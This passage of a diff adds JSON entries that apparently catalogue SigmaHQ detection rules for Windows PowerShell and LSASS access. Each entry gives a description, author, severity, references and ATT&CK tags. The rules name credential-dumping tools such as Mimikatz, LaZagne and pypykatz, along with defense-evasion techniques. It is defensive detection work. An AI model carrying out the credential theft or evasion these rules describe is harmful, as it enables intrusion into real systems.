+ ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", + "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + }, + { + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win32_product_install_msi.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", + "value": "PowerShell WMI Win32_Product Install MSI" + }, + { + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_windows_firewall_profile_disabled.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", 
+ "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", + "value": "Windows Firewall Profile Disabled" + }, + { + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_winlogon_helper_dll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "value": "Winlogon Helper DLL" + }, + { + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win_defender_exclusions_added.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "value": "Windows Defender Exclusions Added - PowerShell" + }, + { + "description": "Detects parameters used by WMImplant", + "meta": { + "author": "NVISO", + "creation_date": "2020/03/26", + "falsepositive": [ + "Administrative scripts that use the same keywords." 
+ ], + "filename": "posh_ps_wmimplant.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/FortyNorthSecurity/WMImplant", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "value": "WMImplant Hack Tool" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_persistence.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "value": "Powershell WMI Persistence" + }, + { + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "value": "WMIC Unquoted Services Path Lookup - PowerShell" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_xml_iex.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "value": "Powershell XML Execute Command" + }, + { + "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/11", + "falsepositive": [ + "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" + ], + "filename": 
"process_access_win_shellcode_inject_msf_empire.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "value": "Shellcode Injection" + }, + { + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "meta": { + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "creation_date": "2022/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "process_access_win_susp_seclogon.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "value": "Suspicious LSASS Access Via MalSecLogon" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_access_win_cmstp_execution_by_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + 
"https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" + ] + }, + "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "value": "CMSTP Execution Process Access" + }, + { + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/boku7/injectAmsiBypass", + "https://github.com/boku7/spawn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", + "value": "CobaltStrike BOF Injection Pattern" + }, + { + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "meta": { + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", + "creation_date": "2017/02/16", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; please add more filters" + ], + "filename": "proc_access_win_cred_dump_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" + ] + }, + "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "value": "Credential Dumping Tools Accessing LSASS Memory" + }, + { + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "meta": { + "author": "Christian Burkard, Tim Shelton", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess" + }, + { + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_hack_sysmonente.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage" + }, + { + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "meta": { + "author": "Bhabesh Raj (rule), @thefLinkk", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_handlekatz_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS Handle" + }, + { + "description": "Detects 
suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_invoke_phantom.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess" + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "meta": { + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "creation_date": "2020/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" + ] + }, + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne" + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" + ] + }, + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection" + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface" + }, + { + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL" + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Samir Bousseaden, Michael Haag", + "creation_date": "2019/04/03", + "falsepositive": [ + "False positives are present when looking for 0x1410. Exclusions may be required." + ], + "filename": "proc_access_win_lsass_memdump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump" + }, + { + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Unlikely, since these tools shouldn't access lsass.exe at all" + ], + "filename": "proc_access_win_lsass_memdump_evasion.yml", + "level": 
"high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes" + }, + { + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Rare programs that contain the word dump in their name and access lsass" + ], + "filename": "proc_access_win_lsass_memdump_indicators.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump" + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Florian Roth", + "creation_date": "2012/06/27", + "falsepositive": [ + "Actual 
failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "filename": "proc_access_win_lsass_werfault.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS" + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "meta": { + "author": "John Lambert (tech), Florian Roth (rule)", + "creation_date": "2017/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process" + }, + { + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "meta": { + "author": "Patryk Prauze - ING Tech", + "creation_date": "2019/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + 
"https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ] + }, + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management" + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/13", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_rare_proc_access_lsass.yml", + "level": "medium", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + 
"https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on LSASS Access" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access" + }, + { + "description": "Detects process access to LSASS memory with suspicious access 
flags and from a suspicious folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/27", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder" + }, + { + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "meta": { + "author": "Florent Labouyrie", + "creation_date": "2021/04/30", + "falsepositive": [ + "Non identified legit exectubale" + ], + "filename": "proc_access_win_svchost_cred_dump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" + ], + "tags": [ + "attack.t1548" + ] + }, + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump" + }, + { + "description": "Detects the pattern of UAC Bypass using a WoW64 
